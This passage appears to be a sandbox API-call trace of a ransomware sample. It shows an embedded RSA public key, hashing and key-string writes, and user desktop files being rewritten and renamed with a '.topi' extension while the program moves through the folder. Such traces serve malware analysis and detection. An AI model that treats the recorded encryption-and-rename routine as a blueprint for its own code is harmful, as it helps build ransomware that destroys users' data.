KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.504] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.504] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6deef8) returned 1 [0094.505] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.505] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.505] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.505] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0094.505] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.505] GetLastError () returned 0x0 [0094.505] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.505] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0094.505] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.505] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.506] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.506] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.506] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x68e0) returned 0x99f52d8 [0094.506] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.506] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3a00 [0094.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9030 [0094.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3a48 [0094.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9048 [0094.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9078 [0094.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9090 [0094.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0094.506] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0094.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.506] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9078 | out: hHeap=0x680000) returned 1 [0094.506] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9090 | out: hHeap=0x680000) returned 1 [0094.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0094.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9090 [0094.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0094.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9078 [0094.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0094.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0094.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9090 | out: hHeap=0x680000) returned 1 [0094.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9078 | out: hHeap=0x680000) returned 1 [0094.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.508] GetCurrentThreadId () returned 0x8c4 [0094.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e19d0 [0094.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0094.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.508] GetCurrentThreadId () returned 0x8c4 [0094.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.509] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9078 [0094.509] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0094.509] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9090 [0094.509] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.509] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.510] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9060 [0094.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.510] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.510] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.510] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.510] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d90a8 [0094.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.510] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8eb0 [0094.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.510] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0094.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.510] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0094.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.510] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0094.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9078 | out: hHeap=0x680000) returned 1 [0094.510] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9078 [0094.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.510] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0094.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.510] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0094.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.510] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0094.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0094.510] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0094.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.511] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0094.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9078 | out: hHeap=0x680000) returned 1 [0094.511] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x320fab0 [0094.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0094.511] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0094.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0094.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0094.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0094.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0094.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0094.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x320fab0 | out: hHeap=0x680000) returned 1 [0094.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90a8 | out: hHeap=0x680000) returned 1 [0094.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9090 | out: hHeap=0x680000) returned 1 [0094.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9060 | out: hHeap=0x680000) returned 1 [0094.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0094.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0094.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0094.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9048 | out: hHeap=0x680000) returned 1 [0094.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3a48 | out: hHeap=0x680000) returned 1 [0094.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0094.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0094.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0094.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0094.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0094.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0094.512] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f52d8*, nNumberOfBytesToWrite=0x68d5, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f52d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x68d5, lpOverlapped=0x0) returned 1 [0094.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0094.512] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x68da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.512] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0094.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0094.512] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0094.512] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0094.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0094.513] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0094.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0094.513] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0094.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0094.513] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0094.513] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0094.513] CloseHandle (hObject=0x6a8) returned 1 [0094.514] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0094.514] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0094.514] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0094.514] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iueS2lmfYi1KxXP3HbP.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iues2lmfyi1kxxp3hbp.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iueS2lmfYi1KxXP3HbP.m4a.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iues2lmfyi1kxxp3hbp.m4a.topi")) returned 1 [0094.517] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.517] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.517] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.519] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0094.519] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1631cb00, ftCreationTime.dwHighDateTime=0x1d5be2f, ftLastAccessTime.dwLowDateTime=0xdc80c20, ftLastAccessTime.dwHighDateTime=0x1d5bc74, ftLastWriteTime.dwLowDateTime=0xdc80c20, ftLastWriteTime.dwHighDateTime=0x1d5bc74, nFileSizeHigh=0x0, nFileSizeLow=0x10a3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mDpwW.png", cAlternateFileName="")) returned 1 [0094.519] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0094.519] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cab80 [0094.519] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.519] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mDpwW.png") returned=".png" [0094.519] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mDpwW.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mdpww.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.519] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=4259) returned 1 [0094.519] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.522] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x107d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.522] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.523] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.523] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.523] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.523] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, 